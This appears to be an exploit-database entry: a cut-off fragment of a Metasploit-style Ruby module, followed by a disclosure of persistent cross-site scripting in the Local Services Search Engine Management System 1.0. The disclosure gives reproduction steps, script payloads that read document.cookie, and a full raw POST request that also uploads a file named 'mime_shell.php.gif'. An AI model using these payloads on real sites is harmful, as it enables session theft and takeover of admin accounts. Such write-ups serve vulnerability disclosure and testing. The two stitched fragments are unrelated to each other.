normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) end end end

# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS) # Date: 2021-03-03 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867 # Version: v1.0 # Tested on: Ubuntu *Steps to Reproduce:* 1) Login with Admin Credentials and click on the *Person List* button. 2) Click on the *Add Person* button. 3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite. 4) Now add the following payload input field of *Name & Address*. Payload 1: ba1man"></td><script>alert(document.cookie)</script> Payload 2: ba2man"></td><script>alert(document.URL)</script> 4) Click On Add 5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3 6) XSS payload is triggered. 7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25 8) Again XSS payload is triggered *Proof-of-concept:* 1) Vulnerable Form Request: POST /LSSMES/lssems/admin/add-person.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------366892106534365372313887502624 Content-Length: 1110 Origin: http:// localhost Connection: close Referer: http:// localhost /LSSMES/lssems/admin/add-person.php Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc Upgrade-Insecure-Requests: 1 -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="category" 3 -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="name" *ba1man"></td><script>alert(document.cookie)</script>* -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif" Content-Type: image/gif GIF8; -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="mobilenumber" 8524697125 -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="address" *ba1man"></td><script>alert(document.URL)</script>* -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="city" -----------------------------366892106534365372313887502624 Content-Disposition: form-data; name="submit" -----------------------------366892106534365372313887502624-- 2.1) Response: Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3 Note: XSS from name parameter 2.2) Response: Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25 Note: XSS from address parameter